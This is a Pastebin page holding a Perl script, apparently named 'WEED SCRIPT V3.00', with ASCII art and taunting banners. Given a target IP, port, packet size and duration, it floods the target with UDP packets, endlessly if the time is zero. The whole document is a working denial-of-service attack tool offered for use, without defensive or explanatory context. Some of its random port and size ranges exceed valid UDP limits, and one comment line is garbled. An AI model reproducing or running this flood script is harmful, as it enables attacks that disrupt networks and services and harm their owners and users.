xttpx

weed

Dec 7th, 2022 (edited)
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.71 KB | None | 0 0
  1. use Socket;
  2. use strict;
  3.  
  4. if ($#ARGV != 3) {
  5.   print "WEED SCRIPT V3.00 <ip> <port> <size> <time>\n\n";
  6.   print " port=0: use random ports\n";
  7.   print " size=0: use random size between 64 and 65000\n";
  8.   print " time=0: continuous flood\n";
  9.   exit(1);
  10. }
  11. #if(EDITED_WEED_SCRIPT_DDOS_RUNNING_VPS_SERVER \-f/END SCRIPT
  12. my ($ip,$port,$size,$time) = @ARGV;
  13.  
  14. my ($iaddr,$endtime,$psize,$pport);
  15.  
  16. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  17. $endtime = time() + ($time ? $time : 500000000);
  18.  
  19. socket(flood, PF_INET, SOCK_DGRAM, 17);
  20.  
  21. print <<EOTEXT;
  22.                        .
  23.                       00
  24.                       000
  25.                      00000                  .
  26.                      000000                00
  27.       .             0000000              0000
  28.       0000          0000000            00000
  29.       00000         00000000          000000
  30.        000000       00000000        0000000
  31.         0000000     00000000      000000000
  32.         0000000      0000000     000000000
  33.          0000000     00000000   000000000
  34.            000000000  0000000   00000000
  35.              0000000   000000  0000000            .
  36.               000000  00000  0000000        000000
  37.    .           000000  0000  000000    000000000
  38.     0000000     000000 000   0000   00000000000
  39.      0000000000   0000  00  0000  00000000000
  40.        00000000000  000 00 000  0000000000
  41.           00000000000 00 0 0  000000000
  42.              00000000000000 0000
  43.                       000000000
  44.                     000     000000
  45.  
  46.          ROLLING UP PLEASE WAIT.....
  47.          Coded By: || xttpx ||
  48.          
  49. EOTEXT
  50.  
  51. print "SMOKING SKIDS SKINTERNET ;)
  52. $ip" . ($port ? $port : "random") . " port with " .
  53.   ($size ? "$size-byte" : "random size") . " packets" .
  54.   ($time ? " for $time seconds" : "") . "\n";
  55. print "Break with Ctrl-C\n" unless $time;
  56.  
  57. for (;time() <= $endtime;) {
  58.   $psize = $size ? $size : int(rand(1500000-64)+64) ;
  59.   $pport = $port ? $port : int(rand(1500000))+1;
  60.  
  61.  send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepPTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afauhgjhgjhgjhgjhgjgubihjbghfhgbjnkncvguihjihijguyyihhfduyhjkjhdcfghnjkjhucdrxcftgfvbhnjiknhcrdcfvghunmjikngdcrftgyvbnjikm","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
Add Comment
Please, Sign In to add comment